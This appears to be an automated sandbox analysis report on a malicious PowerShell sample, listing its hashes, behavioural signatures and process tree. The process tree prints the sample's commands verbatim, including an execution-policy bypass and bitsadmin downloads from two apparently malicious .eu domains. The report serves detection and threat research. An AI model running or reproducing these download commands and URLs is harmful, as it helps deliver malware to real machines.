Overview
overview
10Static
static
1WyChVIlbg/...Zb.ps1
windows7-x64
10WyChVIlbg/...Zb.ps1
windows10-2004-x64
10WyChVIlbg/...Zb.vbs
windows7-x64
1WyChVIlbg/...Zb.vbs
windows10-2004-x64
1WyChVIlbg/main.sh
windows7-x64
3WyChVIlbg/main.sh
windows10-2004-x64
3WyChVIlbg/sleep.sh
windows7-x64
3WyChVIlbg/sleep.sh
windows10-2004-x64
3WyChVIlbg/...Zb.ps1
windows7-x64
10WyChVIlbg/...Zb.ps1
windows10-2004-x64
10WyChVIlbg/...Zb.vbs
windows7-x64
1WyChVIlbg/...Zb.vbs
windows10-2004-x64
1WyChVIlbg/main.sh
windows7-x64
3WyChVIlbg/main.sh
windows10-2004-x64
3WyChVIlbg/sleep.sh
windows7-x64
3WyChVIlbg/sleep.sh
windows10-2004-x64
3Analysis
-
max time kernel
93s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
29-11-2024 11:59
Static task
static1
Behavioral task
behavioral1
Sample
WyChVIlbg/UaqyTpZb.ps1
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
WyChVIlbg/UaqyTpZb.ps1
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
WyChVIlbg/UaqyTpZb.vbs
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
WyChVIlbg/UaqyTpZb.vbs
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
WyChVIlbg/main.sh
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
WyChVIlbg/main.sh
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
WyChVIlbg/sleep.sh
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
WyChVIlbg/sleep.sh
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
WyChVIlbg/UaqyTpZb.ps1
Resource
win7-20240729-en
Behavioral task
behavioral10
Sample
WyChVIlbg/UaqyTpZb.ps1
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
WyChVIlbg/UaqyTpZb.vbs
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
WyChVIlbg/UaqyTpZb.vbs
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
WyChVIlbg/main.sh
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
WyChVIlbg/main.sh
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
WyChVIlbg/sleep.sh
Resource
win7-20240903-en
Behavioral task
behavioral16
Sample
WyChVIlbg/sleep.sh
Resource
win10v2004-20241007-en
General
-
Target
WyChVIlbg/UaqyTpZb.ps1
-
Size
2KB
-
MD5
8540f5e40048f2e57fb5e2df66dbfe87
-
SHA1
eb038fd0f3e8bf11fdd16935de73ccf41d0331fd
-
SHA256
7005d74259760c7cc54a73e1c52cd8f7ff4aa641dac00fba952bc11d6557aae5
-
SHA512
b9555215dee32445c78a8138c885a5bb496dbd88d5d6f3037b9c427444fecb1cee0c5a2e3a23911f20ad2270f4e637725fbfae6cd19de5f8116924b817eba754
Malware Config
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
bitsadmin.exebitsadmin.exedescription pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2432 4008 bitsadmin.exe 84 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 380 4008 bitsadmin.exe 84 -
Download via BitsAdmin 1 TTPs 2 IoCs
Processes:
bitsadmin.exebitsadmin.exepid Process 2432 bitsadmin.exe 380 bitsadmin.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid Process 3900 powershell.exe 3900 powershell.exe 3900 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid Process Token: SeDebugPrivilege 3900 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
powershell.exedescription pid Process procid_target PID 3900 wrote to memory of 1660 3900 powershell.exe 85 PID 3900 wrote to memory of 1660 3900 powershell.exe 85 PID 3900 wrote to memory of 2752 3900 powershell.exe 87 PID 3900 wrote to memory of 2752 3900 powershell.exe 87
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\WyChVIlbg\UaqyTpZb.ps11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3900 -
C:\Windows\system32\getmac.exe"C:\Windows\system32\getmac.exe" /fo table2⤵PID:1660
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /reset2⤵PID:2752
-
-
C:\Windows\system32\bitsadmin.exebitsadmin /transfer Venxlq /priority FOREGROUND "https://yjtyhm13.eu/topic//a664ac34b99095b53d20eaab5c203ca5.html" C:\Users\Admin\AppData\Local\Temp\WyChVIlbg\0_svchost.log1⤵
- Process spawned unexpected child process
- Download via BitsAdmin
PID:2432
-
C:\Windows\system32\bitsadmin.exebitsadmin /transfer UnRidS /priority FOREGROUND "https://nmhholiut13.eu/topic//a664ac34b99095b53d20eaab5c203ca5.html" C:\Users\Admin\AppData\Local\Temp\WyChVIlbg\1_svchost.log1⤵
- Process spawned unexpected child process
- Download via BitsAdmin
PID:380
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82